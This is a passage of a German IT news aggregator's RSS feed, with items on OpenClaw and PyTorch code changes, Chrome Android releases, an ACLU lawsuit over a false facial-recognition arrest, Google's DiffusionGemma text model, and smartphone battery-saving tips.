<li>UI/mobile/TUI: preserve dashboard session parent lineage, WebChat backscroll, reset soft command args, sidebar session picker interactivity, collapsed workspace files, resolved <code>/model</code> confirmation refs, and stale foreground iOS Gateway reconnects. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596719543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/90658" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/90658/hovercard" href="https://github.com/openclaw/openclaw/pull/90658">#90658</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4654733246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92622" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92622/hovercard" href="https://github.com/openclaw/openclaw/pull/92622">#92622</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4610838716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/91353" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/91353/hovercard" href="https://github.com/openclaw/openclaw/pull/91353">#91353</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655805295" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92705" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92705/hovercard" href="https://github.com/openclaw/openclaw/pull/92705">#92705</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656658624" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92779/hovercard" href="https://github.com/openclaw/openclaw/pull/92779">#92779</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656549718" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92773/hovercard" href="https://github.com/openclaw/openclaw/pull/92773">#92773</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4653327563" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92552" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92552/hovercard" href="https://github.com/openclaw/openclaw/pull/92552">#92552</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TurboTheTurtle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TurboTheTurtle">@TurboTheTurtle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhouhe-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhouhe-xydt">@zhouhe-xydt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NarahariRaghava/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NarahariRaghava">@NarahariRaghava</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Solvely-Colin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Solvely-Colin">@Solvely-Colin</a>.</li>
<li>Release and test reliability: extend slow Gateway/full-suite watchdogs, split local full-suite shards when throttled, stabilize plugin auth marker fixtures, avoid brittle provider-ref error text, and keep QA Lab bootstrap selection assertions aligned with flow-only scenarios. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4655119984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/92652" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/92652/hovercard" href="https://github.com/openclaw/openclaw/pull/92652">#92652</a>)</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/f4c949d41880c6cbcaf5fa87c9a466ec559e22c4: Use C++20 concepts where it improves readability (#179286)]]></title>
<description><![CDATA[C++20 introduces concepts which can simplify some template code. In this PR, I have changed some instances of enable_if with concepts where it's not hard to verify correctness. #176662
Pull Request resolved: #179286
Approved by: https://github.com/malfet, https://github.com/Skylion007, https://gi...]]></description>
<link>https://tsecurity.de/de/3594893/downloads/trunkf4c949d41880c6cbcaf5fa87c9a466ec559e22c4-use-c-20-concepts-where-it-improves-readability-179286/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594893/downloads/trunkf4c949d41880c6cbcaf5fa87c9a466ec559e22c4-use-c-20-concepts-where-it-improves-readability-179286/</guid>
<pubDate>Sat, 13 Jun 2026 04:46:35 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>C++20 introduces concepts which can simplify some template code. In this PR, I have changed some instances of enable_if with concepts where it's not hard to verify correctness. <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4031326243" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/176662" data-hovercard-type="issue" data-hovercard-url="/pytorch/pytorch/issues/176662/hovercard" href="https://github.com/pytorch/pytorch/issues/176662">#176662</a></p>
<p>Pull Request resolved: <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4201818191" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/179286" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/179286/hovercard" href="https://github.com/pytorch/pytorch/pull/179286">#179286</a><br>
Approved by: <a href="https://github.com/malfet">https://github.com/malfet</a>, <a href="https://github.com/Skylion007">https://github.com/Skylion007</a>, <a href="https://github.com/cyyever">https://github.com/cyyever</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why Real-Life Disclosure Day Will Look Nothing Like Steven Spielberg’s New Movie]]></title>
<description><![CDATA[Previous landmark scientific discoveries like the Higgs boson provide a better template for what it will take to confirm whether aliens have made contact with Earth.]]></description>
<link>https://tsecurity.de/de/3593270/it-nachrichten/why-real-life-disclosure-day-will-look-nothing-like-steven-spielbergs-new-movie/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593270/it-nachrichten/why-real-life-disclosure-day-will-look-nothing-like-steven-spielbergs-new-movie/</guid>
<pubDate>Fri, 12 Jun 2026 13:22:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Previous landmark scientific discoveries like the Higgs boson provide a better template for what it will take to confirm whether aliens have made contact with Earth.]]></content:encoded>
</item>
<item>
<title><![CDATA[ciflow/xpu/186797: [XPU] Fix test_autotune_gemm_choice_validation for mm_plus_mm, add TODO]]></title>
<description><![CDATA[Per Claude code review: removing the Triton mm_plus_mm template on XPU
broke test_autotune_gemm_choice_validation which asserts TritonTemplateCaller
is always present when max_autotune=True. Guard the assertion for the
mm_plus_mm+XPU case.
Also add TODO(#184490) in mm_plus_mm.py to mark the XPU g...]]></description>
<link>https://tsecurity.de/de/3592270/downloads/ciflowxpu186797-xpu-fix-testautotunegemmchoicevalidation-for-mmplusmm-add-todo/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592270/downloads/ciflowxpu186797-xpu-fix-testautotunegemmchoicevalidation-for-mmplusmm-add-todo/</guid>
<pubDate>Fri, 12 Jun 2026 05:01:37 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Per Claude code review: removing the Triton mm_plus_mm template on XPU<br>
broke test_autotune_gemm_choice_validation which asserts TritonTemplateCaller<br>
is always present when max_autotune=True. Guard the assertion for the<br>
mm_plus_mm+XPU case.</p>
<p>Also add TODO(<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4483674345" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184490" data-hovercard-type="issue" data-hovercard-url="/pytorch/pytorch/issues/184490/hovercard" href="https://github.com/pytorch/pytorch/issues/184490">#184490</a>) in mm_plus_mm.py to mark the XPU guard as temporary<br>
— it should be lifted once the underlying Triton codegen accuracy bug is<br>
fixed so XPU can benefit from the fused template perf.</p>
<p>Co-authored-by: Copilot <a href="mailto:223556219+Copilot@users.noreply.github.com">223556219+Copilot@users.noreply.github.com</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome for Android Update]]></title>
<description><![CDATA[Hi, everyone! We've just released Chrome 149 (149.0.7827.114) for Android. It'll become available on Google Play over the next few days. This release includes stability and performance improvements. You can see a full list of the changes in the Git log. If you find a new issue, please let us know...]]></description>
<link>https://tsecurity.de/de/3592184/it-security-nachrichten/chrome-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592184/it-security-nachrichten/chrome-for-android-update/</guid>
<pubDate>Fri, 12 Jun 2026 03:35:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi, everyone! We've just released <b>Chrome 149 (149.0.7827.114)</b> for Android. It'll become <a href="https://play.google.com/store/apps/details?id=com.android.chrome">available on Google Play</a> over the next few days. </p><p>This release includes stability and performance improvements. You can see a full list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.102..149.0.7827.114?pretty=fuller&amp;n=10000">Git log</a>. If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><div><br></div><div>Android releases contain the same security fixes as their corresponding<a href="https://chromereleases.googleblog.com/2026/06/stable-channel-update-for-desktop_0153744567.html"> Desktop releases</a> (Windows &amp; Mac: 149.0.7827.114/115, Linux: 149.0.7872.114) unless otherwise noted.</div><div><div><br></div><div><div>Harry Souders</div><div><a href="https://www.google.com/chrome/">Google Chrome</a></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ACLU Sues After Facial Recognition Falsely Identifies Florida Man As a Child Abductor]]></title>
<description><![CDATA[fjo3 shares a report from Reason: Police arrested a man in Florida for attempted child abduction in a town he had never visited, and the only evidence linking him to the crime was an AI facial recognition hit. Represented by the American Civil Liberties Union (ACLU), he is now suing the officers ...]]></description>
<link>https://tsecurity.de/de/3591670/it-security-nachrichten/aclu-sues-after-facial-recognition-falsely-identifies-florida-man-as-a-child-abductor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591670/it-security-nachrichten/aclu-sues-after-facial-recognition-falsely-identifies-florida-man-as-a-child-abductor/</guid>
<pubDate>Thu, 11 Jun 2026 21:23:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[fjo3 shares a report from Reason: Police arrested a man in Florida for attempted child abduction in a town he had never visited, and the only evidence linking him to the crime was an AI facial recognition hit. Represented by the American Civil Liberties Union (ACLU), he is now suing the officers and agencies who put him through it. [...] According to a police report, facial recognition software concluded with 93 percent confidence that the suspect was Robert Dillon. [...]
 
The ACLU is now suing the city of Jacksonville Beach, as well as the individual police officers and officials involved in the case. According to the lawsuit (PDF), the responding officer viewed security camera footage of the suspect but didn't take a copy; instead, he took pictures of the screen with his cell phone. "In the photos, the suspect image is low resolution, and the suspect's face is partially shadowed and off-axis," the lawsuit claims. When an investigator queried the facial recognition system, it was with the officer's grainy secondhand cell phone photos. [...]
 
But as the ACLU notes, facial recognition's accuracy "depends significantly on the quality of the probe image. Lower-quality images contain less interpretable facial data, degrading the system's ability to produce a reliable template." At the very least, it requires a much better source image. Besides, no such investigative tool should form the sole basis for an arrest warrant. "If you came to me with a facial recognition hit and that was your probable cause, I would probably kick you out of my office because that's not how it works," Jacksonville Sheriff T.K. Waters told local news. (Waters is among those being sued in the ACLU lawsuit, because it was an investigator from the Jacksonville Sheriff's Office who ran the grainy photo through facial recognition and advised O'Connell it was a "93% match" to Dillon.)<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=ACLU+Sues+After+Facial+Recognition+Falsely+Identifies+Florida+Man+As+a+Child+Abductor%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F11%2F1736213%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F11%2F1736213%2Faclu-sues-after-facial-recognition-falsely-identifies-florida-man-as-a-child-abductor%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/11/1736213/aclu-sues-after-facial-recognition-falsely-identifies-florida-man-as-a-child-abductor?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google's DiffusionGemma generates 256 tokens in parallel and self-corrects as it goes]]></title>
<description><![CDATA[GenAI image generators like Stable Diffusion do not draw a picture pixel by pixel from left to right. They start with noise and iteratively refine the entire image in parallel until it converges, in a process known as diffusion. For years, applying that same principle to text generation had remai...]]></description>
<link>https://tsecurity.de/de/3591156/it-nachrichten/googles-diffusiongemma-generates-256-tokens-in-parallel-and-self-corrects-as-it-goes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3591156/it-nachrichten/googles-diffusiongemma-generates-256-tokens-in-parallel-and-self-corrects-as-it-goes/</guid>
<pubDate>Thu, 11 Jun 2026 18:02:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>GenAI image generators like Stable Diffusion do not draw a picture pixel by pixel from left to right. They start with noise and iteratively refine the entire image in parallel until it converges, in a process known as diffusion. For years, applying that same principle to text generation had remained out of reach at scale.</p><p>Standard language models work like a typewriter: one token at a time, left to right, with no ability to revise a committed output. That pattern works in the cloud, where batch sizes keep GPUs saturated. For local inference or low-concurrency deployments, the GPU is idle most of the time.</p><p>Google's DiffusionGemma, released this week, is an open source experimental model that applies diffusion to text generation at production scale. Built on the<a href="https://venturebeat.com/technology/googles-new-open-source-gemma-4-12b-analyzes-audio-video-and-runs-entirely-locally-on-a-typical-16gb-enterprise-laptop"> Gemma 4</a> backbone and released under the Apache 2.0 license, it is the first diffusion language model natively supported in the open source vLLM inference platform. It generates a 256-token block in parallel rather than sequentially, with every token position attending to every other. Google says DiffusionGemma generates text up to 4x faster than standard models on GPUs. At batch size 1 on a single Nvidia H100, the FP8 version reaches 1,008 tokens per second. On H200, it hits 1,288 — roughly six times a standard autoregressive baseline, according to vLLM benchmark results published today.</p><p>Despite the speed gains, Google did not oversell the release. The company's<a href="https://blog.google/innovation-and-ai/technology/developers-tools/diffusion-gemma-faster-text-generation/"> launch post</a> acknowledged directly that DiffusionGemma's overall output quality is lower than standard Gemma 4, adding "For applications that demand maximum quality, we recommend deploying standard Gemma 4."</p><h2>What DiffusionGemma does</h2><p>DiffusionGemma does not generate tokens in order. It starts with a block of 256 random placeholder tokens, effectively a blank canvas, and runs multiple refinement passes over the entire block at once. On each pass, it evaluates every position and locks in the ones it is most confident about. Uncertain positions get randomized and reconsidered on the next pass, with the model using what it resolved in the previous round to inform the next attempt. The block converges progressively until enough positions stabilize to anchor the rest.</p><p>Two things follow from that architecture.</p><ul><li><p><b>Self-correction.</b> An autoregressive model that commits to a wrong token is stuck with it, because subsequent tokens are already conditioned on the mistake. DiffusionGemma can identify low-confidence positions and re-evaluate them on the next pass.</p></li><li><p><b>Bidirectional context.</b> Every position attends to every other position in the block simultaneously, including tokens that appear later in the sequence. That makes the model structurally better suited to constrained generation tasks where left-to-right generation fails.</p></li></ul><p>Google demonstrated both properties with a fine-tuned Sudoku solver. The base model solved zero puzzles. After fine-tuning on a Sudoku dataset, it reached an 80% success rate and converged in 12 denoising steps rather than 48. The efficiency gain came directly from the model's ability to self-correct and stop early.</p><h2><b>How it was built</b></h2><p>DiffusionGemma runs as a 26B Mixture of Experts model that activates only 3.8B parameters during inference. Quantized, it fits within 18GB VRAM on consumer hardware including the Nvidia RTX 4090 and 5090. Google and NVIDIA also optimized for enterprise Hopper and Blackwell servers using NVFP4 kernels.</p><p>The vLLM integration required new work because DiffusionGemma does not fit the standard serving model. A typical vLLM batch applies the same attention type to every request. DiffusionGemma requests alternate between causal and bidirectional attention as they cycle through prompt reading, canvas refinement and block commit. The team built per-request attention switching into both the Triton and FlashAttention 4 backends and reused the existing speculative decoding path for the refinement loop.</p><p>The new ModelState interface the team built for this integration is designed to support additional diffusion models in vLLM as they emerge.</p><h2>Where the speed wins and where it does not</h2><p>DiffusionGemma's speed advantage is real but conditional. Where it applies depends entirely on deployment context.</p><p><b>The numbers.</b> At batch size 1 on a single H100, vLLM's published benchmarks put the FP8 model at roughly five times a standard autoregressive baseline. On H200, roughly six times. Those peak figures reflect optimal conditions: single user, dedicated hardware, FP8 quantization.</p><p><b>Where it wins.</b> Local inference, single-user applications and low-concurrency serving. In those conditions the GPU has spare compute and memory bandwidth is the bottleneck. DiffusionGemma's parallel block generation fills that gap.</p><p><b>Where it does not.</b> High-throughput cloud serving. When a server is batching hundreds of concurrent requests, autoregressive models already saturate available compute and DiffusionGemma's parallel decoding provides diminishing returns.</p><p><b>The quality ceiling.</b> Guilherme O'Tina, an AI researcher, <a href="https://x.com/guilhermeotina/status/2064745517922279473">put a finer point on it on X</a>. "Local artifacts vs hallucinations are different problems and that decides where this actually wins," O'Tina wrote.</p><h2>How it compares</h2><p>Diffusion language models are not new. Researchers have built them at smaller scales for several years, and<a href="https://www.inceptionlabs.ai/blog/introducing-mercury"> Inception Labs' Mercury Coder</a> applied the approach commercially to coding tasks in 2025. What DiffusionGemma adds is scale — a 26B MoE backbone, native vLLM serving and a general-purpose instruction-tuned model rather than a domain-specific one.</p><p>The more useful comparison for engineers evaluating this against existing inference tooling is speculative decoding, and the distinction matters. Speculative decoding keeps a standard autoregressive target model and uses a smaller draft model to guess several tokens ahead. The target model verifies them in one pass. If sampling is correct, the output distribution stays identical to the target. The architecture is unchanged.</p><p><a href="https://x.com/AndrewK404/status/2064775703334105170">Andrew Kuncevich</a>, an ML and AI researcher focused on production AI systems, put it directly on X. "DiffusionGemma is different. It does not just guess future tokens. It creates a noisy 256-token canvas and repeatedly denoises the whole block in parallel. So it's not just a decoding trick — it's a different generation paradigm," Kuncevich wrote.</p><p>Compared to standard Gemma 4, the trade is speed for quality. Google's benchmark data shows DiffusionGemma below standard Gemma 4 on general output quality metrics, with the gap varying by task.</p><p>On structured constrained tasks, including code infilling, template generation and problems requiring bidirectional constraint propagation, the architecture has a structural advantage that fine-tuning can surface, as the Sudoku result demonstrates. On open-ended generation, standard Gemma 4 remains the stronger option.</p><h2>What this means for enterprises</h2><p>DiffusionGemma serves via a standard vLLM OpenAI-compatible endpoint with no diffusion-specific pipeline changes required. </p><p>This is not a general-purpose model upgrade.</p><p><b>For teams running local or low-concurrency inference, the architecture choice just expanded.</b> Until now, cutting generation latency on dedicated GPU hardware meant using a smaller model and accepting the quality trade-off. DiffusionGemma offers a third path at the same parameter footprint, on consumer hardware, with same-day vLLM support.</p><p><b>For constrained generation workloads, bidirectional attention is worth evaluating.</b> Code infilling, structured data generation and tasks where correct output depends on context not yet generated are where this architecture has a structural edge.</p><p>The ModelState interface built for this integration is designed to generalize as additional diffusion models emerge.</p><p>The quality trade-off is real and Google acknowledges it. For teams running local inference on dedicated GPU hardware, this is worth testing.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Dev for Android Update]]></title>
<description><![CDATA[Hi everyone! We've just released Chrome Dev 151 (151.0.7885.0) for Android. It's now available on Google Play.You can see a partial list of the changes in the Git log. For details on new features, check out the Chromium blog, and for details on web platform updates, check here.If you find a new i...]]></description>
<link>https://tsecurity.de/de/3590919/it-security-nachrichten/chrome-dev-for-android-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590919/it-security-nachrichten/chrome-dev-for-android-update/</guid>
<pubDate>Thu, 11 Jun 2026 16:40:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi everyone! We've just released Chrome Dev 151 (151.0.7885.0) for Android. It's now available on <a href="https://play.google.com/store/apps/details?id=com.chrome.dev">Google Play</a>.</p><p>You can see a partial list of the changes in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.15..151.0.7885.0?pretty=fuller&amp;n=10000">Git log</a>. For details on new features, check out the <a href="https://blog.chromium.org/">Chromium blog</a>, and for details on web platform updates, check <a href="https://www.chromestatus.com/features#milestone%3D151">here</a>.</p><p>If you find a new issue, please let us know by <a href="https://code.google.com/p/chromium/issues/entry?template=Android%20Issue">filing a bug</a>.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[13 Einstellungen, mit denen Ihr Smartphone-Akku länger hält]]></title>
<description><![CDATA[Die Akkulaufzeit zählt für viele Nutzer nach wie vor zu den wichtigsten Eigenschaften eines Smartphones. Auch wenn in Ihrem Modell kein Riesen-Akku verbaut ist, können Sie mit den richtigen Einstellungen und ein paar einfachen Maßnahmen, mehr Laufzeit herausholen. Wir stellen 13 praktische Tipps ...]]></description>
<link>https://tsecurity.de/de/3590772/windows-tipps/13-einstellungen-mit-denen-ihr-smartphone-akku-laenger-haelt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590772/windows-tipps/13-einstellungen-mit-denen-ihr-smartphone-akku-laenger-haelt/</guid>
<pubDate>Thu, 11 Jun 2026 15:40:07 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Die Akkulaufzeit zählt für viele Nutzer nach wie vor zu den wichtigsten Eigenschaften eines Smartphones. Auch wenn in Ihrem Modell kein Riesen-Akku verbaut ist, können Sie mit den richtigen Einstellungen und ein paar einfachen Maßnahmen, mehr Laufzeit herausholen. Wir stellen 13 praktische Tipps vor.</p>



<p>Hinweis: Je nach Smartphone und Android-Version können die Bezeichnungen und Menüs leicht variieren. Für diesen Artikel nutzen wir ein <a href="https://www.pcwelt.de/article/2605138/samsung-galaxy-s25-ultra-test-2.html" target="_blank" rel="noreferrer noopener">Samsung Galaxy S25 Ultra</a> mit Android 16 als Beispiel. Die meisten Hersteller orientieren sich jedoch an einem ähnlichen Navigationsaufbau. Falls Sie eine Einstellung nicht auf Anhieb finden, nutzen Sie einfach die Suchfunktion in den Smartphone-Einstellungen.</p>



<div class="wp-block-idg-base-theme-listicle-chart-block wp-block-product-chart product-chart">
<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading  toc">Adaptive Helligkeit, Bildschirm-Timeout und Always-On-Display</h2>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2abaa000259"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/display_akku.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Akku schonen Android" class="wp-image-3154484" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Denise Bergert</p></div>



<ul class="wp-block-list">
<li>Das Display Ihres Smartphones ist einer der größten Stromfresser. Wenn Sie die Helligkeit verringern, können Sie damit viel Energie sparen. Sie können die Helligkeit manuell einstellen oder die Funktion <strong><em>“Adaptive Helligkeit” </em></strong>aktivieren<em>,</em> die den Bildschirm an die aktuellen Lichtverhältnisse anpasst. Sie finden die Option in den Einstellungen unter <em><strong>“Anzeige”</strong></em>.</li>



<li>Sie können auch die Zeitspanne verkürzen, nach der der Bildschirm automatisch ausgeschaltet wird, wenn Sie Ihr Smartphone nicht verwenden. Je kürzer das Display aktiv bleibt, desto weniger Energie verbraucht es. Die Option <em><strong>“Bildschirm-Timeout”</strong></em> finden Sie in den Einstellungen unter <strong><em>“Anzeige”</em></strong>. Sie müssen allerdings nicht warten, bis sich das Display von selbst ausschaltet. Ein Druck auf die Ein-/Aus-Taste genügt, um den Bildschirm sofort zu sperren.</li>



<li>Die Funktion <strong><em>„Always-On-Display“</em></strong> sorgt dafür, dass der Bildschirm dauerhaft Uhrzeit und Datum anzeigt. Das ist praktisch, verbraucht aber auch unnötig Strom. Sie können die Option unter “<strong><em>Sperrbildschirm und AOD</em></strong>” deaktivieren.</li>
</ul>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-1 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/how-to_door" data-aa-targeting='{"pos":"BTF1"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-1 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading  toc">Dunkelmodus und Bildschirmschoner</h2>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2abaa000dab"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/bildschirmschoner.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Dark Mode Android" class="wp-image-3154513" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Denise Bergert</p></div>



<ul class="wp-block-list">
<li>Viele Smartphones bieten einen Dunkelmodus beziehungsweise <strong><em>“Dark Mode”</em></strong>. Statt eines hellen Hintergrunds mit dunkler Schrift zeigt das Smartphone einen dunklen Hintergrund mit heller Schrift an. Das spart Energie und schont die Augen. Wenn Sie den Modus nicht dauerhaft nutzen möchten, können Sie ihn auch nur nachts aktivieren. Die Option finden Sie in den Einstellungen unter <strong><em>“Anzeige”</em></strong> und <strong><em>“Dark Mode”</em></strong>.</li>



<li>Wenn Sie Strom sparen möchten, sollten Sie unter <strong><em>“Anzeige”</em></strong> auch den <strong><em>“Bildschirmschoner”</em></strong> deaktivieren. Er verhindert, dass sich das Display vollständig ausschaltet. </li>
</ul>
</div></div>
<!-- @@AD gpt-leaderboardmainbod-2 PRE @@--><div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false" data-aaad="true" data-aa-adunit="/8456/IDG.DE_B2C_PCWelt.de/how-to_door" data-aa-targeting='{"pos":"BTF2"}'>
				</div><!-- @@AD gpt-leaderboardmainbod-2 POST @@-->


<div class="wp-block-listicle-chart"><div class="listicle-chart-separator"></div><div class="wp-block-listicle-chart-item listicle-chart-item">
<h2 class="wp-block-heading  toc">Bildwiederholrate verrringern</h2>



